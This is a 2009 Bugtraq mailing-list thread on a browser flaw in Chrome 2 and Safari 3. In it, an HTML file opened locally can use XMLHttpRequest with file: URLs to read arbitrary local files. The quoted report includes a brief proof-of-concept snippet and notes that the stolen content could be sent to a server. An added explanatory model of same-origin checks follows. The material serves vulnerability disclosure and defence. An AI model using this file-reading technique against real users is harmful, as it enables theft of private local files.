Message-ID: <10e6de610906091221w1d531c57g9641c224f569d3e8@mail.gmail.com>
Date: Tue, 9 Jun 2009 20:21:32 +0100
From: "Adrian P." <ap@...citizen.org>
To: pantera_bleed@...mail.com
Cc: bugtraq@...urityfocus.com
Subject: Re: XMLHttpRequest file upload vulnerability Chrome 2 & Safari 3
It's always been possible to steal local files if you can convince a
user to open a "harmless" HTML file from their local filesystem. This
is possible because the scripting code runs within the local context (in
FF terminology; not sure what Safari calls it).
Last time I checked [1] [2], FF didn't even issue a warning when
opening a local file with scripting code in it, although I haven't
checked in the case of Safari.
[1] http://www.gnucitizen.org/blog/web-pages-from-hell-2/
[2] http://marc.info/?l=bugtraq&m=116386919506057&w=2
On Tue, Jun 9, 2009 at 5:33 PM, <pantera_bleed@...mail.com> wrote:
>
> An .html file can be crafted to force an unaware user to read a file from their local machine, and then possibly send it to a server.
>
> var method = "GET"
> var URL = "file:///C:/argentina/bsas_junin.txt"
> xmlhttp.open( method, URL, true)
>
> This type of request is possible if the file is on the user's local hard disk (CHROME2); in another browser I was able to do the same but with LAN access to the file, no need to write to the local hard disk (SAFARI3).
>
>
> // The request object must exist before the check below; the posted
> // snippet also never sent the request, so send() is added here.
> var xmlhttp = new XMLHttpRequest();
> if (xmlhttp != null) {
>     xmlhttp.open(method, URL, true);
>     xmlhttp.onreadystatechange = function() {
>         if (xmlhttp.readyState == 4) {
>             alert(URL + "\n\n" + xmlhttp.responseText);
>         }
>     };
>     xmlhttp.send(null);
> }
>
> This is a valid operation; JavaScript can then read xmlhttp.responseText, yes, the file content.
>
> After this you can do whatever you want with the file.
>
> Note that you MUST know the file path!!
>
> crafted by: federico.lanusse
> pantera_bleed@...mail.com
> federico.lanusse@...rolab.com
>
> company: clarolab QA team
> Yeah! Let's rock, A-team!!
>
> Chrome ISSUE, with attached POC.
> http://code.google.com/p/chromium/issues/detail?id=13671
>
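The thread's point is really about how a browser decides what a script loaded from a file: URL may read. The example below is added here and is not code from either poster or from any browser vendor: it models the same-origin decision a browser makes before letting a script read an XMLHttpRequest response, contrasting the permissive treatment the report describes (every file: URL counted as one origin, so a local .html can read any local file whose path it knows) with the strict treatment current browsers default to (each file: document is an opaque origin that matches nothing). The policy names "legacy" and "strict", the function names and the scenario URLs other than the one quoted from the report are assumptions of this example.

```javascript
// Added example (not from the original thread or any browser): a compact
// model of the same-origin check applied to XMLHttpRequest reads.
// "legacy" = all file: URLs share one origin (the behaviour reported for
// Chrome 2 / Safari 3); "strict" = each file: document is an opaque origin.
// Policy and function names are this example's own assumptions.

const POLICIES = new Set(["legacy", "strict"]);

// Returns true when a script in `documentUrl` may read the response of an
// XHR to `requestUrl` under `policy`; false when the read is cross-origin.
function xhrReadAllowed(documentUrl, requestUrl, policy) {
  if (!POLICIES.has(policy)) throw new Error(`unknown policy: ${policy}`);
  const doc = new URL(documentUrl);
  const target = new URL(requestUrl);

  if (target.protocol === "file:") {
    // A page served over the network never gets local files, under any policy.
    if (doc.protocol !== "file:") return false;
    // legacy: all file: URLs share one origin, so the read goes through.
    // strict: the document's origin is opaque and equals no other origin,
    // not even another file: URL (or itself), so the read is refused.
    return policy === "legacy";
  }

  // Network target. A file: document has no (scheme, host, port) tuple to
  // compare, so it is cross-origin to every network resource.
  if (doc.protocol === "file:") return false;
  // Ordinary case: same scheme, host and port means same origin.
  return doc.origin === target.origin;
}

// Constructed scenarios; the first one is the case from the report, a
// locally opened page requesting file:///C:/argentina/bsas_junin.txt.
const SCENARIOS = [
  ["file:///C:/Users/alice/harmless.html", "file:///C:/argentina/bsas_junin.txt"],
  ["file:///C:/Users/alice/harmless.html", "http://example.com/collect"],
  ["http://example.com/page.html", "file:///C:/argentina/bsas_junin.txt"],
  ["http://example.com/page.html", "http://example.com/api"],
  ["http://example.com/page.html", "https://example.com/api"],
];

// Evaluates every scenario under both policies and returns one row each,
// so the difference between the two models can be read off directly.
function compareScenarios(scenarios = SCENARIOS) {
  return scenarios.map(([doc, req]) => ({
    document: doc,
    request: req,
    legacy: xhrReadAllowed(doc, req, "legacy"),
    strict: xhrReadAllowed(doc, req, "strict"),
  }));
}

for (const row of compareScenarios()) {
  console.log(`${row.document} -> ${row.request}: legacy=${row.legacy} strict=${row.strict}`);
}
```

Only the first row differs between the two models: the local-to-local read that the report relies on is allowed under "legacy" and refused under "strict", while reads from a network page to a local file are refused under both. That one row is the whole of the defect, which is why treating file: documents as opaque origins (what browsers do today) closes it without affecting ordinary web pages.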